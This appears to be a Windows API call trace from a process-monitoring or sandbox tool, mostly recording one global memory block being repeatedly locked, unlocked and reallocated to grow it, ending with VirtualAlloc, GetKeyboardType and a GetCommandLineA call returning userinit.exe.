[0178.684] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.684] GlobalUnlock (hMem=0x65000c) returned 0
[0178.684] GlobalReAlloc (hMem=0x65000c, dwBytes=0x4c000, uFlags=0x2) returned 0x65000c
[0178.684] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.685] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.685] GlobalUnlock (hMem=0x65000c) returned 0
[0178.685] GlobalReAlloc (hMem=0x65000c, dwBytes=0x4e000, uFlags=0x2) returned 0x65000c
[0178.685] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.685] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.685] GlobalUnlock (hMem=0x65000c) returned 0
[0178.685] GlobalReAlloc (hMem=0x65000c, dwBytes=0x50000, uFlags=0x2) returned 0x65000c
[0178.685] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.686] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.686] GlobalUnlock (hMem=0x65000c) returned 0
[0178.686] GlobalReAlloc (hMem=0x65000c, dwBytes=0x52000, uFlags=0x2) returned 0x65000c
[0178.686] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.686] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.686] GlobalUnlock (hMem=0x65000c) returned 0
[0178.686] GlobalReAlloc (hMem=0x65000c, dwBytes=0x54000, uFlags=0x2) returned 0x65000c
[0178.686] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.687] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.687] GlobalUnlock (hMem=0x65000c) returned 0
[0178.687] GlobalReAlloc (hMem=0x65000c, dwBytes=0x56000, uFlags=0x2) returned 0x65000c
[0178.687] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.687] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.687] GlobalUnlock (hMem=0x65000c) returned 0
[0178.687] GlobalReAlloc (hMem=0x65000c, dwBytes=0x58000, uFlags=0x2) returned 0x65000c
[0178.687] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.688] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.688] GlobalUnlock (hMem=0x65000c) returned 0
[0178.688] GlobalReAlloc (hMem=0x65000c, dwBytes=0x5a000, uFlags=0x2) returned 0x65000c
[0178.688] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.688] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.688] GlobalUnlock (hMem=0x65000c) returned 0
[0178.688] GlobalReAlloc (hMem=0x65000c, dwBytes=0x5c000, uFlags=0x2) returned 0x65000c
[0178.688] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.689] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.689] GlobalUnlock (hMem=0x65000c) returned 0
[0178.689] GlobalReAlloc (hMem=0x65000c, dwBytes=0x5e000, uFlags=0x2) returned 0x65000c
[0178.689] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.689] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.689] GlobalUnlock (hMem=0x65000c) returned 0
[0178.689] GlobalReAlloc (hMem=0x65000c, dwBytes=0x60000, uFlags=0x2) returned 0x65000c
[0178.689] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.690] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.690] GlobalUnlock (hMem=0x65000c) returned 0
[0178.690] GlobalReAlloc (hMem=0x65000c, dwBytes=0x62000, uFlags=0x2) returned 0x65000c
[0178.690] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.690] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.690] GlobalUnlock (hMem=0x65000c) returned 0
[0178.690] GlobalReAlloc (hMem=0x65000c, dwBytes=0x64000, uFlags=0x2) returned 0x65000c
[0178.690] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.691] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.691] GlobalUnlock (hMem=0x65000c) returned 0
[0178.691] GlobalReAlloc (hMem=0x65000c, dwBytes=0x66000, uFlags=0x2) returned 0x65000c
[0178.691] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.691] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.691] GlobalUnlock (hMem=0x65000c) returned 0
[0178.691] GlobalReAlloc (hMem=0x65000c, dwBytes=0x68000, uFlags=0x2) returned 0x65000c
[0178.691] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.692] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.692] GlobalUnlock (hMem=0x65000c) returned 0
[0178.692] GlobalReAlloc (hMem=0x65000c, dwBytes=0x6a000, uFlags=0x2) returned 0x65000c
[0178.692] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.692] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.692] GlobalUnlock (hMem=0x65000c) returned 0
[0178.692] GlobalReAlloc (hMem=0x65000c, dwBytes=0x6c000, uFlags=0x2) returned 0x65000c
[0178.696] GlobalLock (hMem=0x65000c) returned 0x260820
[0178.696] GlobalHandle (pMem=0x260820) returned 0x65000c
[0178.696] GlobalUnlock (hMem=0x65000c) returned 0
[0178.697] GlobalReAlloc (hMem=0x65000c, dwBytes=0x6e000, uFlags=0x2) returned 0x65000c
[0178.697] GlobalLock (hMem=0x65000c) returned 0x260820
[0178.697] GlobalHandle (pMem=0x260820) returned 0x65000c
[0178.697] GlobalUnlock (hMem=0x65000c) returned 0
[0178.697] GlobalReAlloc (hMem=0x65000c, dwBytes=0x70000, uFlags=0x2) returned 0x65000c
[0178.755] GlobalLock (hMem=0x65000c) returned 0x22b0048
[0178.755] GlobalHandle (pMem=0x22b0048) returned 0x65000c
[0178.756] GlobalUnlock (hMem=0x65000c) returned 0
[0178.756] GlobalReAlloc (hMem=0x65000c, dwBytes=0x72000, uFlags=0x2) returned 0x65000c
[0178.759] GlobalLock (hMem=0x65000c) returned 0x2320058
[0178.760] GlobalHandle (pMem=0x2320058) returned 0x65000c
[0178.760] GlobalUnlock (hMem=0x65000c) returned 0
[0178.760] GlobalReAlloc (hMem=0x65000c, dwBytes=0x74000, uFlags=0x2) returned 0x65000c
[0178.760] GlobalLock (hMem=0x65000c) returned 0x2320058
[0178.761] GlobalHandle (pMem=0x2320058) returned 0x65000c
[0178.761] GlobalUnlock (hMem=0x65000c) returned 0
[0178.761] GlobalReAlloc (hMem=0x65000c, dwBytes=0x76000, uFlags=0x2) returned 0x65000c
[0178.773] GlobalLock (hMem=0x65000c) returned 0x1f6810
[0178.774] GlobalHandle (pMem=0x1f6810) returned 0x65000c
[0178.774] GlobalUnlock (hMem=0x65000c) returned 0
[0178.774] GlobalReAlloc (hMem=0x65000c, dwBytes=0x78000, uFlags=0x2) returned 0x65000c
[0178.778] GlobalLock (hMem=0x65000c) returned 0x22b0048
[0178.779] GlobalHandle (pMem=0x22b0048) returned 0x65000c
[0178.779] GlobalUnlock (hMem=0x65000c) returned 0
[0178.779] GlobalReAlloc (hMem=0x65000c, dwBytes=0x7a000, uFlags=0x2) returned 0x65000c
[0178.784] GlobalLock (hMem=0x65000c) returned 0x2328058
[0178.785] GlobalHandle (pMem=0x2328058) returned 0x65000c
[0178.785] GlobalUnlock (hMem=0x65000c) returned 0
[0178.785] GlobalReAlloc (hMem=0x65000c, dwBytes=0x7c000, uFlags=0x2) returned 0x65000c
[0178.785] GlobalLock (hMem=0x65000c) returned 0x2328058
[0178.786] GlobalHandle (pMem=0x2328058) returned 0x65000c
[0178.786] GlobalUnlock (hMem=0x65000c) returned 0
[0178.786] GlobalReAlloc (hMem=0x65000c, dwBytes=0x7e000, uFlags=0x2) returned 0x65000c
[0178.799] GlobalLock (hMem=0x65000c) returned 0x23b0048
[0178.800] GlobalHandle (pMem=0x23b0048) returned 0x65000c
[0178.800] GlobalUnlock (hMem=0x65000c) returned 0
[0178.800] GlobalReAlloc (hMem=0x65000c, dwBytes=0x80000, uFlags=0x2) returned 0x65000c
[0178.861] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0178.862] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0178.862] GlobalUnlock (hMem=0x65000c) returned 0
[0178.863] GlobalReAlloc (hMem=0x65000c, dwBytes=0x82000, uFlags=0x2) returned 0x65000c
[0178.872] GlobalLock (hMem=0x65000c) returned 0x2640020
[0178.873] GlobalHandle (pMem=0x2640020) returned 0x65000c
[0178.873] GlobalUnlock (hMem=0x65000c) returned 0
[0178.873] GlobalReAlloc (hMem=0x65000c, dwBytes=0x84000, uFlags=0x2) returned 0x65000c
[0178.882] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0178.882] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0178.882] GlobalUnlock (hMem=0x65000c) returned 0
[0178.882] GlobalReAlloc (hMem=0x65000c, dwBytes=0x86000, uFlags=0x2) returned 0x65000c
[0178.891] GlobalLock (hMem=0x65000c) returned 0x2640020
[0178.892] GlobalHandle (pMem=0x2640020) returned 0x65000c
[0178.892] GlobalUnlock (hMem=0x65000c) returned 0
[0178.892] GlobalReAlloc (hMem=0x65000c, dwBytes=0x88000, uFlags=0x2) returned 0x65000c
[0178.947] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0178.948] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0178.948] GlobalUnlock (hMem=0x65000c) returned 0
[0178.948] GlobalReAlloc (hMem=0x65000c, dwBytes=0x8a000, uFlags=0x2) returned 0x65000c
[0178.957] GlobalLock (hMem=0x65000c) returned 0x2640020
[0178.958] GlobalHandle (pMem=0x2640020) returned 0x65000c
[0178.958] GlobalUnlock (hMem=0x65000c) returned 0
[0178.958] GlobalReAlloc (hMem=0x65000c, dwBytes=0x8c000, uFlags=0x2) returned 0x65000c
[0178.967] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0178.968] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0178.968] GlobalUnlock (hMem=0x65000c) returned 0
[0178.968] GlobalReAlloc (hMem=0x65000c, dwBytes=0x8e000, uFlags=0x2) returned 0x65000c
[0178.981] GlobalLock (hMem=0x65000c) returned 0x2640020
[0178.981] GlobalHandle (pMem=0x2640020) returned 0x65000c
[0178.982] GlobalUnlock (hMem=0x65000c) returned 0
[0178.982] GlobalReAlloc (hMem=0x65000c, dwBytes=0x90000, uFlags=0x2) returned 0x65000c
[0179.041] GlobalLock (hMem=0x65000c) returned 0x26d0020
[0179.042] GlobalHandle (pMem=0x26d0020) returned 0x65000c
[0179.042] GlobalUnlock (hMem=0x65000c) returned 0
[0179.042] GlobalReAlloc (hMem=0x65000c, dwBytes=0x92000, uFlags=0x2) returned 0x65000c
[0179.052] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.053] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.053] GlobalUnlock (hMem=0x65000c) returned 0
[0179.053] GlobalReAlloc (hMem=0x65000c, dwBytes=0x94000, uFlags=0x2) returned 0x65000c
[0179.063] GlobalLock (hMem=0x65000c) returned 0x2650020
[0179.063] GlobalHandle (pMem=0x2650020) returned 0x65000c
[0179.063] GlobalUnlock (hMem=0x65000c) returned 0
[0179.063] GlobalReAlloc (hMem=0x65000c, dwBytes=0x96000, uFlags=0x2) returned 0x65000c
[0179.073] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.074] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.074] GlobalUnlock (hMem=0x65000c) returned 0
[0179.074] GlobalReAlloc (hMem=0x65000c, dwBytes=0x98000, uFlags=0x2) returned 0x65000c
[0179.117] GlobalLock (hMem=0x65000c) returned 0x2650020
[0179.118] GlobalHandle (pMem=0x2650020) returned 0x65000c
[0179.118] GlobalUnlock (hMem=0x65000c) returned 0
[0179.118] GlobalReAlloc (hMem=0x65000c, dwBytes=0x9a000, uFlags=0x2) returned 0x65000c
[0179.128] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.129] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.129] GlobalUnlock (hMem=0x65000c) returned 0
[0179.129] GlobalReAlloc (hMem=0x65000c, dwBytes=0x9c000, uFlags=0x2) returned 0x65000c
[0179.139] GlobalLock (hMem=0x65000c) returned 0x2650020
[0179.139] GlobalHandle (pMem=0x2650020) returned 0x65000c
[0179.139] GlobalUnlock (hMem=0x65000c) returned 0
[0179.139] GlobalReAlloc (hMem=0x65000c, dwBytes=0x9e000, uFlags=0x2) returned 0x65000c
[0179.150] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.151] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.151] GlobalUnlock (hMem=0x65000c) returned 0
[0179.151] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa0000, uFlags=0x2) returned 0x65000c
[0179.208] GlobalLock (hMem=0x65000c) returned 0x2650020
[0179.209] GlobalHandle (pMem=0x2650020) returned 0x65000c
[0179.209] GlobalUnlock (hMem=0x65000c) returned 0
[0179.209] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa2000, uFlags=0x2) returned 0x65000c
[0179.220] GlobalLock (hMem=0x65000c) returned 0x2700020
[0179.221] GlobalHandle (pMem=0x2700020) returned 0x65000c
[0179.221] GlobalUnlock (hMem=0x65000c) returned 0
[0179.221] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa4000, uFlags=0x2) returned 0x65000c
[0179.232] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.232] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.232] GlobalUnlock (hMem=0x65000c) returned 0
[0179.232] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa6000, uFlags=0x2) returned 0x65000c
[0179.244] GlobalLock (hMem=0x65000c) returned 0x2660020
[0179.245] GlobalHandle (pMem=0x2660020) returned 0x65000c
[0179.245] GlobalUnlock (hMem=0x65000c) returned 0
[0179.245] GlobalReAlloc (hMem=0x65000c, dwBytes=0xa8000, uFlags=0x2) returned 0x65000c
[0179.303] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.304] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.304] GlobalUnlock (hMem=0x65000c) returned 0
[0179.304] GlobalReAlloc (hMem=0x65000c, dwBytes=0xaa000, uFlags=0x2) returned 0x65000c
[0179.315] GlobalLock (hMem=0x65000c) returned 0x2660020
[0179.316] GlobalHandle (pMem=0x2660020) returned 0x65000c
[0179.316] GlobalUnlock (hMem=0x65000c) returned 0
[0179.316] GlobalReAlloc (hMem=0x65000c, dwBytes=0xac000, uFlags=0x2) returned 0x65000c
[0179.327] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.328] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.328] GlobalUnlock (hMem=0x65000c) returned 0
[0179.328] GlobalReAlloc (hMem=0x65000c, dwBytes=0xae000, uFlags=0x2) returned 0x65000c
[0179.340] GlobalLock (hMem=0x65000c) returned 0x2660020
[0179.341] GlobalHandle (pMem=0x2660020) returned 0x65000c
[0179.341] GlobalUnlock (hMem=0x65000c) returned 0
[0179.341] GlobalReAlloc (hMem=0x65000c, dwBytes=0xb0000, uFlags=0x2) returned 0x65000c
[0179.401] GlobalLock (hMem=0x65000c) returned 0x2710020
[0179.402] GlobalHandle (pMem=0x2710020) returned 0x65000c
[0179.402] GlobalUnlock (hMem=0x65000c) returned 0
[0179.402] GlobalReAlloc (hMem=0x65000c, dwBytes=0xb2000, uFlags=0x2) returned 0x65000c
[0179.414] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.415] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.415] GlobalUnlock (hMem=0x65000c) returned 0
[0179.415] GlobalReAlloc (hMem=0x65000c, dwBytes=0xb4000, uFlags=0x2) returned 0x65000c
[0179.426] GlobalLock (hMem=0x65000c) returned 0x2670020
[0179.427] GlobalHandle (pMem=0x2670020) returned 0x65000c
[0179.427] GlobalUnlock (hMem=0x65000c) returned 0
[0179.427] GlobalReAlloc (hMem=0x65000c, dwBytes=0xb6000, uFlags=0x2) returned 0x65000c
[0179.439] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.440] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.440] GlobalUnlock (hMem=0x65000c) returned 0
[0179.440] GlobalReAlloc (hMem=0x65000c, dwBytes=0xb8000, uFlags=0x2) returned 0x65000c
[0179.498] GlobalLock (hMem=0x65000c) returned 0x2670020
[0179.499] GlobalHandle (pMem=0x2670020) returned 0x65000c
[0179.499] GlobalUnlock (hMem=0x65000c) returned 0
[0179.499] GlobalReAlloc (hMem=0x65000c, dwBytes=0xba000, uFlags=0x2) returned 0x65000c
[0179.512] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.513] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.513] GlobalUnlock (hMem=0x65000c) returned 0
[0179.513] GlobalReAlloc (hMem=0x65000c, dwBytes=0xbc000, uFlags=0x2) returned 0x65000c
[0179.525] GlobalLock (hMem=0x65000c) returned 0x2670020
[0179.526] GlobalHandle (pMem=0x2670020) returned 0x65000c
[0179.526] GlobalUnlock (hMem=0x65000c) returned 0
[0179.526] GlobalReAlloc (hMem=0x65000c, dwBytes=0xbe000, uFlags=0x2) returned 0x65000c
[0179.587] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.588] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.588] GlobalUnlock (hMem=0x65000c) returned 0
[0179.588] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc0000, uFlags=0x2) returned 0x65000c
[0179.602] GlobalLock (hMem=0x65000c) returned 0x2670020
[0179.603] GlobalHandle (pMem=0x2670020) returned 0x65000c
[0179.603] GlobalUnlock (hMem=0x65000c) returned 0
[0179.603] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc2000, uFlags=0x2) returned 0x65000c
[0179.619] GlobalLock (hMem=0x65000c) returned 0x2740020
[0179.620] GlobalHandle (pMem=0x2740020) returned 0x65000c
[0179.620] GlobalUnlock (hMem=0x65000c) returned 0
[0179.620] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc4000, uFlags=0x2) returned 0x65000c
[0179.682] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.683] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.684] GlobalUnlock (hMem=0x65000c) returned 0
[0179.684] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc6000, uFlags=0x2) returned 0x65000c
[0179.698] GlobalLock (hMem=0x65000c) returned 0x2680020
[0179.699] GlobalHandle (pMem=0x2680020) returned 0x65000c
[0179.699] GlobalUnlock (hMem=0x65000c) returned 0
[0179.699] GlobalReAlloc (hMem=0x65000c, dwBytes=0xc8000, uFlags=0x2) returned 0x65000c
[0179.712] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.713] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.713] GlobalUnlock (hMem=0x65000c) returned 0
[0179.713] GlobalReAlloc (hMem=0x65000c, dwBytes=0xca000, uFlags=0x2) returned 0x65000c
[0179.741] GlobalLock (hMem=0x65000c) returned 0x2680020
[0179.742] GlobalHandle (pMem=0x2680020) returned 0x65000c
[0179.742] GlobalUnlock (hMem=0x65000c) returned 0
[0179.742] GlobalReAlloc (hMem=0x65000c, dwBytes=0xcc000, uFlags=0x2) returned 0x65000c
[0179.757] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.758] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.758] GlobalUnlock (hMem=0x65000c) returned 0
[0179.758] GlobalReAlloc (hMem=0x65000c, dwBytes=0xce000, uFlags=0x2) returned 0x65000c
[0179.774] GlobalLock (hMem=0x65000c) returned 0x2680020
[0179.774] GlobalHandle (pMem=0x2680020) returned 0x65000c
[0179.774] GlobalUnlock (hMem=0x65000c) returned 0
[0179.774] GlobalReAlloc (hMem=0x65000c, dwBytes=0xd0000, uFlags=0x2) returned 0x65000c
[0179.822] GlobalLock (hMem=0x65000c) returned 0x2750020
[0179.822] GlobalHandle (pMem=0x2750020) returned 0x65000c
[0179.822] GlobalUnlock (hMem=0x65000c) returned 0
[0179.822] GlobalReAlloc (hMem=0x65000c, dwBytes=0xd2000, uFlags=0x2) returned 0x65000c
[0179.836] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.837] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.837] GlobalUnlock (hMem=0x65000c) returned 0
[0179.837] GlobalReAlloc (hMem=0x65000c, dwBytes=0xd4000, uFlags=0x2) returned 0x65000c
[0179.851] GlobalLock (hMem=0x65000c) returned 0x2690020
[0179.852] GlobalHandle (pMem=0x2690020) returned 0x65000c
[0179.852] GlobalUnlock (hMem=0x65000c) returned 0
[0179.852] GlobalReAlloc (hMem=0x65000c, dwBytes=0xd6000, uFlags=0x2) returned 0x65000c
[0179.899] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.900] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.900] GlobalUnlock (hMem=0x65000c) returned 0
[0179.900] GlobalReAlloc (hMem=0x65000c, dwBytes=0xd8000, uFlags=0x2) returned 0x65000c
[0179.914] GlobalLock (hMem=0x65000c) returned 0x2690020
[0179.915] GlobalHandle (pMem=0x2690020) returned 0x65000c
[0179.915] GlobalUnlock (hMem=0x65000c) returned 0
[0179.915] GlobalReAlloc (hMem=0x65000c, dwBytes=0xda000, uFlags=0x2) returned 0x65000c
[0179.929] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0179.930] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0179.930] GlobalUnlock (hMem=0x65000c) returned 0
[0179.930] GlobalReAlloc (hMem=0x65000c, dwBytes=0xdc000, uFlags=0x2) returned 0x65000c
[0179.995] GlobalLock (hMem=0x65000c) returned 0x2690020
[0179.996] GlobalHandle (pMem=0x2690020) returned 0x65000c
[0179.996] GlobalUnlock (hMem=0x65000c) returned 0
[0179.996] GlobalReAlloc (hMem=0x65000c, dwBytes=0xde000, uFlags=0x2) returned 0x65000c
[0180.012] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.013] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.013] GlobalUnlock (hMem=0x65000c) returned 0
[0180.013] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe0000, uFlags=0x2) returned 0x65000c
[0180.027] GlobalLock (hMem=0x65000c) returned 0x2690020
[0180.028] GlobalHandle (pMem=0x2690020) returned 0x65000c
[0180.028] GlobalUnlock (hMem=0x65000c) returned 0
[0180.028] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe2000, uFlags=0x2) returned 0x65000c
[0180.043] GlobalLock (hMem=0x65000c) returned 0x2780020
[0180.044] GlobalHandle (pMem=0x2780020) returned 0x65000c
[0180.044] GlobalUnlock (hMem=0x65000c) returned 0
[0180.044] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe4000, uFlags=0x2) returned 0x65000c
[0180.059] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.060] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.060] GlobalUnlock (hMem=0x65000c) returned 0
[0180.060] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe6000, uFlags=0x2) returned 0x65000c
[0180.074] GlobalLock (hMem=0x65000c) returned 0x26a0020
[0180.075] GlobalHandle (pMem=0x26a0020) returned 0x65000c
[0180.075] GlobalUnlock (hMem=0x65000c) returned 0
[0180.075] GlobalReAlloc (hMem=0x65000c, dwBytes=0xe8000, uFlags=0x2) returned 0x65000c
[0180.104] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.104] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.105] GlobalUnlock (hMem=0x65000c) returned 0
[0180.105] GlobalReAlloc (hMem=0x65000c, dwBytes=0xea000, uFlags=0x2) returned 0x65000c
[0180.123] GlobalLock (hMem=0x65000c) returned 0x26a0020
[0180.124] GlobalHandle (pMem=0x26a0020) returned 0x65000c
[0180.124] GlobalUnlock (hMem=0x65000c) returned 0
[0180.124] GlobalReAlloc (hMem=0x65000c, dwBytes=0xec000, uFlags=0x2) returned 0x65000c
[0180.144] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.145] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.145] GlobalUnlock (hMem=0x65000c) returned 0
[0180.145] GlobalReAlloc (hMem=0x65000c, dwBytes=0xee000, uFlags=0x2) returned 0x65000c
[0180.162] GlobalLock (hMem=0x65000c) returned 0x26a0020
[0180.162] GlobalHandle (pMem=0x26a0020) returned 0x65000c
[0180.162] GlobalUnlock (hMem=0x65000c) returned 0
[0180.162] GlobalReAlloc (hMem=0x65000c, dwBytes=0xf0000, uFlags=0x2) returned 0x65000c
[0180.179] GlobalLock (hMem=0x65000c) returned 0x2790020
[0180.180] GlobalHandle (pMem=0x2790020) returned 0x65000c
[0180.180] GlobalUnlock (hMem=0x65000c) returned 0
[0180.180] GlobalReAlloc (hMem=0x65000c, dwBytes=0xf2000, uFlags=0x2) returned 0x65000c
[0180.198] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.199] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.199] GlobalUnlock (hMem=0x65000c) returned 0
[0180.199] GlobalReAlloc (hMem=0x65000c, dwBytes=0xf4000, uFlags=0x2) returned 0x65000c
[0180.215] GlobalLock (hMem=0x65000c) returned 0x26b0020
[0180.216] GlobalHandle (pMem=0x26b0020) returned 0x65000c
[0180.216] GlobalUnlock (hMem=0x65000c) returned 0
[0180.216] GlobalReAlloc (hMem=0x65000c, dwBytes=0xf6000, uFlags=0x2) returned 0x65000c
[0180.231] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.232] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.232] GlobalUnlock (hMem=0x65000c) returned 0
[0180.232] GlobalReAlloc (hMem=0x65000c, dwBytes=0xf8000, uFlags=0x2) returned 0x65000c
[0180.248] GlobalLock (hMem=0x65000c) returned 0x26b0020
[0180.249] GlobalHandle (pMem=0x26b0020) returned 0x65000c
[0180.249] GlobalUnlock (hMem=0x65000c) returned 0
[0180.249] GlobalReAlloc (hMem=0x65000c, dwBytes=0xfa000, uFlags=0x2) returned 0x65000c
[0180.266] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.267] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.267] GlobalUnlock (hMem=0x65000c) returned 0
[0180.267] GlobalReAlloc (hMem=0x65000c, dwBytes=0xfc000, uFlags=0x2) returned 0x65000c
[0180.284] GlobalLock (hMem=0x65000c) returned 0x26b0020
[0180.285] GlobalHandle (pMem=0x26b0020) returned 0x65000c
[0180.285] GlobalUnlock (hMem=0x65000c) returned 0
[0180.285] GlobalReAlloc (hMem=0x65000c, dwBytes=0xfe000, uFlags=0x2) returned 0x65000c
[0180.301] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.302] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.302] GlobalUnlock (hMem=0x65000c) returned 0
[0180.302] GlobalReAlloc (hMem=0x65000c, dwBytes=0x100000, uFlags=0x2) returned 0x65000c
[0180.321] GlobalLock (hMem=0x65000c) returned 0x26b0020
[0180.322] GlobalHandle (pMem=0x26b0020) returned 0x65000c
[0180.322] GlobalUnlock (hMem=0x65000c) returned 0
[0180.322] GlobalReAlloc (hMem=0x65000c, dwBytes=0x102000, uFlags=0x2) returned 0x65000c
[0180.342] GlobalLock (hMem=0x65000c) returned 0x27c0020
[0180.343] GlobalHandle (pMem=0x27c0020) returned 0x65000c
[0180.343] GlobalUnlock (hMem=0x65000c) returned 0
[0180.343] GlobalReAlloc (hMem=0x65000c, dwBytes=0x104000, uFlags=0x2) returned 0x65000c
[0180.360] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.361] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.361] GlobalUnlock (hMem=0x65000c) returned 0
[0180.361] GlobalReAlloc (hMem=0x65000c, dwBytes=0x106000, uFlags=0x2) returned 0x65000c
[0180.378] GlobalLock (hMem=0x65000c) returned 0x26c0020
[0180.379] GlobalHandle (pMem=0x26c0020) returned 0x65000c
[0180.379] GlobalUnlock (hMem=0x65000c) returned 0
[0180.379] GlobalReAlloc (hMem=0x65000c, dwBytes=0x108000, uFlags=0x2) returned 0x65000c
[0180.398] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.399] GlobalHandle (pMem=0x25b0020) returned 0x65000c
[0180.399] GlobalUnlock (hMem=0x65000c) returned 0
[0180.399] GlobalReAlloc (hMem=0x65000c, dwBytes=0x10a000, uFlags=0x2) returned 0x65000c
[0180.417] GlobalLock (hMem=0x65000c) returned 0x26c0020
[0180.418] GlobalHandle (pMem=0x26c0020) returned 0x65000c
[0180.418] GlobalUnlock (hMem=0x65000c) returned 0
[0180.418] GlobalReAlloc (hMem=0x65000c, dwBytes=0x10c000, uFlags=0x2) returned 0x65000c
[0180.435] GlobalLock (hMem=0x65000c) returned 0x25b0020
[0180.436] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x26c0000
[0180.436] VirtualAlloc (lpAddress=0x26c0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x26c0000
[0180.470] GetKeyboardType (nTypeFlag=0) returned 4
[0180.470] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
